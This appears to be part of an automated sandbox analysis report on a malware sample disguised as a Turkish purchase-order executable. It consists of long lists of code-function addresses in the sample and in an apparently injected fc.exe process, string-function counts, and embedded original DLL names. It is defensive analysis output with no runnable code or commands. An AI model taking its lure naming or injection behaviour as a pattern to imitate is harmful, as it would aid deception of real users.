            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07183EE30_2_07183EE3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_07183CC80_2_07183CC8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071819180_2_07181918
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_0718190B0_2_0718190B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071879780_2_07187978
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 0_2_071879670_2_07187967
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004011503_2_00401150
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00401C163_2_00401C16
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040FD4A3_2_0040FD4A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040FD533_2_0040FD53
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00402EF63_2_00402EF6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004166FE3_2_004166FE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040FF733_2_0040FF73
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_00402F003_2_00402F00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_004167033_2_00416703
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0042D7133_2_0042D713
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040DFE93_2_0040DFE9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0040DFF33_2_0040DFF3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C01AA3_2_019C01AA
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B41A23_2_019B41A2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B81CC3_2_019B81CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199A1183_2_0199A118
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F01003_2_018F0100
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019881583_2_01988158
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019920003_2_01992000
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190E3F03_2_0190E3F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C03E63_2_019C03E6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BA3523_2_019BA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019802C03_2_019802C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A02743_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C05913_2_019C0591
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019005353_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AE4F63_2_019AE4F6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A44203_2_019A4420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B24463_2_019B2446
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FC7C03_2_018FC7C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019247503_2_01924750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019007703_2_01900770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191C6E03_2_0191C6E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019029A03_2_019029A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019CA9A63_2_019CA9A6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019169623_2_01916962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E68B83_2_018E68B8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E8F03_2_0192E8F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190A8403_2_0190A840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019028403_2_01902840
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B6BD73_2_019B6BD7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BAB403_2_019BAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FEA803_2_018FEA80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01918DBF3_2_01918DBF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FADE03_2_018FADE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199CD1F3_2_0199CD1F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190AD003_2_0190AD00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0CB53_2_019A0CB5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F0CF23_2_018F0CF2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900C003_2_01900C00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197EFA03_2_0197EFA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2FC83_2_018F2FC8
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01920F303_2_01920F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A2F303_2_019A2F30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01942F283_2_01942F28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01974F403_2_01974F40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01912E903_2_01912E90
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BCE933_2_019BCE93
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BEEDB3_2_019BEEDB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BEE263_2_019BEE26
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900E593_2_01900E59
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0190B1B03_2_0190B1B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019CB16B3_2_019CB16B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EF1723_2_018EF172
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193516C3_2_0193516C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019070C03_2_019070C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AF0CC3_2_019AF0CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B70E93_2_019B70E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BF0E03_2_019BF0E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0194739A3_2_0194739A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B132D3_2_019B132D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018ED34C3_2_018ED34C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019052A03_2_019052A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191B2C03_2_0191B2C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191D2F03_2_0191D2F0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A12ED3_2_019A12ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199D5B03_2_0199D5B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C95C33_2_019C95C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B75713_2_019B7571
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BF43F3_2_019BF43F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F14603_2_018F1460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BF7B03_2_019BF7B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B16CC3_2_019B16CC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019456303_2_01945630
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019959103_2_01995910
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019099503_2_01909950
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191B9503_2_0191B950
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019038E03_2_019038E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0196D8003_2_0196D800
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191FB803_2_0191FB80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01975BF03_2_01975BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0193DBF93_2_0193DBF9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFB763_2_019BFB76
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01945AA03_2_01945AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199DAAC3_2_0199DAAC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A1AA33_2_019A1AA3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019ADAC63_2_019ADAC6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFA493_2_019BFA49
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B7A463_2_019B7A46
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01973A6C3_2_01973A6C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191FDC03_2_0191FDC0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B1D5A3_2_019B1D5A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01903D403_2_01903D40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019B7D733_2_019B7D73
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFCF23_2_019BFCF2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01979C323_2_01979C32
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01901F923_2_01901F92
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFFB13_2_019BFFB1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C3FD53_2_018C3FD5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018C3FD23_2_018C3FD2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BFF093_2_019BFF09
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01909EB03_2_01909EB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D902C09_2_02D902C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB02749_2_02DB0274
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1E3F09_2_02D1E3F0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DD03E69_2_02DD03E6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCA3529_2_02DCA352
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DA20009_2_02DA2000
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC81CC9_2_02DC81CC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DD01AA9_2_02DD01AA
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC41A29_2_02DC41A2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D981589_2_02D98158
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DAA1189_2_02DAA118
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D001009_2_02D00100
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2C6E09_2_02D2C6E0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D0C7C09_2_02D0C7C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D347509_2_02D34750
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D107709_2_02D10770
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DBE4F69_2_02DBE4F6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC24469_2_02DC2446
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB44209_2_02DB4420
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DD05919_2_02DD0591
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D105359_2_02D10535
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D0EA809_2_02D0EA80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC6BD79_2_02DC6BD7
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCAB409_2_02DCAB40
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D3E8F09_2_02D3E8F0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02CF68B89_2_02CF68B8
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1A8409_2_02D1A840
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D128409_2_02D12840
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D129A09_2_02D129A0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DDA9A69_2_02DDA9A6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D269629_2_02D26962
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCEEDB9_2_02DCEEDB
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D22E909_2_02D22E90
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCCE939_2_02DCCE93
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D10E599_2_02D10E59
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCEE269_2_02DCEE26
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D02FC89_2_02D02FC8
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D8EFA09_2_02D8EFA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D84F409_2_02D84F40
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D30F309_2_02D30F30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB2F309_2_02DB2F30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D52F289_2_02D52F28
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D00CF29_2_02D00CF2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB0CB59_2_02DB0CB5
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D10C009_2_02D10C00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D0ADE09_2_02D0ADE0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D28DBF9_2_02D28DBF
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DACD1F9_2_02DACD1F
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1AD009_2_02D1AD00
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2B2C09_2_02D2B2C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2D2F09_2_02D2D2F0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB12ED9_2_02DB12ED
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D152A09_2_02D152A0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D5739A9_2_02D5739A
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02CFD34C9_2_02CFD34C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC132D9_2_02DC132D
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D170C09_2_02D170C0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DBF0CC9_2_02DBF0CC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC70E99_2_02DC70E9
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCF0E09_2_02DCF0E0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D1B1B09_2_02D1B1B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DDB16B9_2_02DDB16B
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D4516C9_2_02D4516C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02CFF1729_2_02CFF172
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC16CC9_2_02DC16CC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D556309_2_02D55630
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCF7B09_2_02DCF7B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D014609_2_02D01460
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCF43F9_2_02DCF43F
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DAD5B09_2_02DAD5B0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC75719_2_02DC7571
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DBDAC69_2_02DBDAC6
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D55AA09_2_02D55AA0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DADAAC9_2_02DADAAC
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DB1AA39_2_02DB1AA3
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFA499_2_02DCFA49
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC7A469_2_02DC7A46
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D83A6C9_2_02D83A6C
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D85BF09_2_02D85BF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D4DBF99_2_02D4DBF9
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2FB809_2_02D2FB80
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFB769_2_02DCFB76
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D138E09_2_02D138E0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D7D8009_2_02D7D800
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D199509_2_02D19950
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2B9509_2_02D2B950
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DA59109_2_02DA5910
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D19EB09_2_02D19EB0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D11F929_2_02D11F92
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFFB19_2_02DCFFB1
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFF099_2_02DCFF09
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DCFCF29_2_02DCFCF2
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D89C329_2_02D89C32
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D2FDC09_2_02D2FDC0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC1D5A9_2_02DC1D5A
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02D13D409_2_02D13D40
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_02DC7D739_2_02DC7D73
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A1A309_2_003A1A30
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003BA5909_2_003BA590
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039CBD09_2_0039CBD0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039CBC79_2_0039CBC7
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039CDF09_2_0039CDF0
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039AE709_2_0039AE70
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0039AE669_2_0039AE66
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A357B9_2_003A357B
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_003A35809_2_003A3580
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302A1169_2_0302A116
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302BA249_2_0302BA24
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302B9049_2_0302B904
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302AE289_2_0302AE28
            Source: C:\Windows\SysWOW64\fc.exeCode function: 9_2_0302BDBC9_2_0302BDBC
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D7EA12 appears 86 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D57E54 appears 107 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D45130 appears 58 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02CFB970 appears 262 times
            Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02D8F290 appears 103 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 01935130 appears 58 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 0196EA12 appears 86 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 01947E54 appears 107 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 0197F290 appears 103 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: String function: 018EB970 appears 262 times
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720342797.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1723792983.000000000D570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
